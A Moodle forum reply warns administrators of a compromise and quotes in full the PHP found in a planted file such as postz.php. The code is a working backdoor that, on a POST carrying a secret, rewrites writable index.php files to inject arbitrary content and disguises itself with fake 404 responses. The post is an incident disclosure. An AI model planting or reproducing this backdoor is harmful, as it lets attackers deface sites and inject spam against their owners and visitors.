Moodle "gone"...

Re: Moodle "gone"...

by Timothy Kane -
Number of replies: 0
Also look for php files in your folders called postz.php or other files that do not belong there..

It looks like it rewites your php files if the are writeable.

Here is an example of the php code found in this file.

<?php

if (!function_exists('file_get_contents')) {
function file_get_contents($filename, $incpath = false, $resource_context = null) {
if (false === $fh = fopen($filename, 'r', $incpath)) {
return false;
}
clearstatcache();
if ($fsize = @filesize($filename)) {
$data = fread($fh, $fsize);
} else {
$data = '';
while (!feof($fh)) {
$data .= fread($fh, 8192);
}
}

fclose($fh);
return $data;
}
}


$secret_key = 'sd;gij32498gjwevgfdsgvluergbw3489';
$files_to_post = array(
'index.php',
'../index.php',
'../../index.php',
'../../../index.php'
);

$error = 0;
if (isset($_POST['data']) && isset($_POST['secret'])) {
if (md5($secret_key) == $_POST['secret']) {
$post_data = stripslashes($_POST['data']);
foreach ($files_to_post as $file_to_post) {
//read file
if (!file_exists($file_to_post) || !is_writable($file_to_post)) {
$error++;
continue;
}
$old_file = file_get_contents($file_to_post);
 
//insert links
if (preg_match('#<!-- moodle -->.+<!-- moodle -->#s', $old_file)) {
$old_file = preg_replace('#<!-- moodle -->.+<!-- moodle -->#s', "<!-- moodle -->\n".$post_data."\n<!-- moodle -->", $old_file);
} else {
$old_file = preg_replace('|print_footer\(["\']home["\']\);|i', "?>\n<!-- moodle -->\n".$post_data."\n<!-- moodle -->\n<?php\nprint_footer('home');", $old_file);
}
//replace old file
$hFile = fopen($file_to_post, 'w');
if (!$hFile) {
$error++;
fclose($hFile);
continue;
}
if (FALSE !== fwrite($hFile, $old_file)) {
fclose($hFile);
} else {
$error++;
fclose($hFile);
}
}
if ($error === 4) {
echo '### Error 404 ###';
} else {
echo 'OK';
}
} else {
echo "### Error 404 ###";
}
} else {
echo "### Error 404 ###";
}
?>


Tim
Average of ratings: -